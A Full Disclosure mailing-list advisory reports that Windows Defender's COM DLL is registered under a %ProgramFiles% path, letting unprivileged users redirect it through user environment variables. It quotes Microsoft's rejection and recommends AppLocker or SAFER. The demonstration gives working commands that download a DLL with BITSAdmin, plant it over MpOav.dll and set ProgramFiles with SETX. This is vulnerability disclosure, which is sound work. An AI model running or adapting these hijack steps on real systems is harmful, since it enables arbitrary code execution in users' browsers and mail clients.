Hi @ll, Microsoft still registers LOTS of DLLs (which implement COM classes, cryptography service providers, services etc.) as well as command lines with paths containing the (pre-defined) environment variables %windir%, %SystemRoot%, %ProgramFiles%, %CommonProgramFiles%, %ProgramFiles(x86)% and %CommonProgramFiles(x86)%.
For example, Windows Defender shipped with Windows Vista and newer versions of Windows, installs a COM class which implements the IOfficeAntiVirus interface (see <https://msdn.microsoft.com/en-us/library/ms537369.aspx>). | REG.exe QUERY HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE} /S | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE} | (Standard) REG_SZ Windows Defender IOfficeAntiVirus implementation | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts | (Standard) REG_SZ Scanned Hosting Applications | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw | (Standard) REG_SZ IAttachmentExecute | Enable REG_DWORD 0x1 | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon | (Standard) REG_SZ ActiveX controls | Enable REG_DWORD 0x1 | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} | | HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32 | (Standard) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\MpOav.dll ~~~~~~~~~~~~~~ here there be dragons! | ThreadingModel REG_SZ Both This COM interface is called from the attachment manager (see <https://support.microsoft.com/en-us/help/883260/information-about-the-attachment-manager-in-microsoft-windows>) The attachment manager in turn is called from file explorer, web browsers, mail/news clients, instant messengers, etc. whenever a user opens/executes a file downloaded from the Internet, i.e. a file that carries the "mark of the web", stores a downloaded file, saves a web page or an attachment. Since (system) environment variables set in a user's profile obscur (system) environment variables with the same name set for the machine, unprivileged users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended DLLs and programs! Demonstration: ~~~~~~~~~~~~~~ On a 32-bit (x86) or 64-bit (x64) installation of Windows Vista or any newer version, except Windows 10 with KB4052623 installed, perform the following steps: 0. Log on to an arbitrary (unprivileged) user account and start the command processor %COMSPEC% alias %SystemRoot%\System32\CMD.exe. 1. Create a directory "Rogue Program Files\" in the root directory of the Windows drive, copy the directory "%ProgramFiles%\Windows Defender\" with its contents into the empty new directory, then create reparse points (junctions) to all other subdirectories of the "%ProgramFiles%\" directory in the new directory: MKDIR "%SystemDrive%\Rogue Program Files" XCOPY.exe "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%?" 2. On 64-bit installations, additionally create a directory "Rogue Program Files (x86)\" in the root directory of the Windows drive, copy the directory "%ProgramFiles(x86)%\Windows Defender\" with its contents into the empty new directory, then create reparse points (junctions) to all other subdirectories of the "%ProgramFiles(x86)%\" directory in the new directory: MKDIR "%SystemDrive%\Rogue Program Files (x86)" XCOPY.exe "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%?" 3. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.CAB> and save it in your "%TEMP%" directory: BITSAdmin.exe /TRANSFER dummy /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TEMP%\SENTINEL.CAB" See <https://skanthak.homepage.t-online.de/sentinel.html> and/or <https://skanthak.homepage.t-online.de/minesweeper.html> for the description/documentation of SENTINEL.DLL 4. Extract SENTINEL.DLL for both architectures/bitnesses (x86: 32-bit; x64: 64-bit) into your "%TEMP%" directory: EXPAND.exe "%TEMP%\SENTINEL.CAB" /F:* "%TEMP%" 5.a. On 32-bit installations, copy the 32-bit SENTINEL.DLL over "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll": COPY /Y "%TEMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll" 5.b. On 64-bit installations, copy the 64-bit SENTINEL.DLL over "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll" and the 32-bit SENTINEL.DLL over "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll": COPY /Y "%TEMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll" COPY /Y "%TEMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll" 6. Set the environment variable "ProgramFiles" to the directory created in step 1: SETX.exe ProgramFiles "%SystemDrive%\Rogue Program Files" 7. On 64-bit installations, additionally set the environment variable "ProgramFiles(x86)" to the directory created in step 2: SETX.exe ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)" 8. Download an arbitrary file with your web browser, for example <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>, or save an attachment in your mail client: START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL "%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE Instead of "C:\Program Files\Windows Defender\MpOav.dll" and "C:\Program Files (x86)\Windows Defender\MpOav.dll" this calls "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll" and "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll", which display message boxes with informations about their caller! NOTE: the batch script <https://skanthak.homepage.t-online.de/download/DEFENDER.CMD> performs all these steps on 32-bit and 64-bit installations of Windows Vista and newer versions of Windows. Vendor statement: ~~~~~~~~~~~~~~~~~ The MSRC assigned case 57439 to the above report, and replied with the following statements: | After investigation, our engineers have determine this this behavior | is by-design and does not constitute as a vulnerability as reported. OUCH! I recommend to teach these "engineers" the difference between a pathname registered as "%ProgramFiles%\...\<filename>.<extension>" and a pathname registered as "C:\Program Files\...\<filename>.<extension>"! HINT: the second variant does NOT allow to load and execute an ARBITRARY DLL via an environment variable set by the user! The observed behaviour is therefore NOT by-design, but due to CARELESS implementation by CLUELESS developers. | For an attacker to do as the report indicates, they would already | need to have gained sufficient control over the victim's system to | change the ProgramFiles environment variable for the process that | is instantiating this COM class. This highlights local code execution. | | Additionally, our design to get AV to load in a utility process | greatly reduces the attack surface of this scenario. OUCH²! The attack surface is but provided by Windows Defender: its POOR implementation (see above) allows this attack in the first place. And there is no utility process started here: the attacker controlled DLL is loaded and executed ih the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended call of the AV's utility process and defeating your design! | Utility processes are also more restricted than the browser process | generally so this is another win in addition to the process decoupling. OUCH³! There is NO decoupled process involved! The demonstration runs an arbitrary DLL in the process of a web browser, a mail/news client, an instant messenger and file explorer, with the credentials of the current user, UNRESTRICTED. | As such, we are closing this case. Mitigation: ~~~~~~~~~~~ Use AppLocker or SAFER alias Software Restriction Policies: see <https://skanthak.homepage.t-online.de/SAFER.html> stay tuned, and far away from Microsoft's UNSAFE products! Stefan Kanthak _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
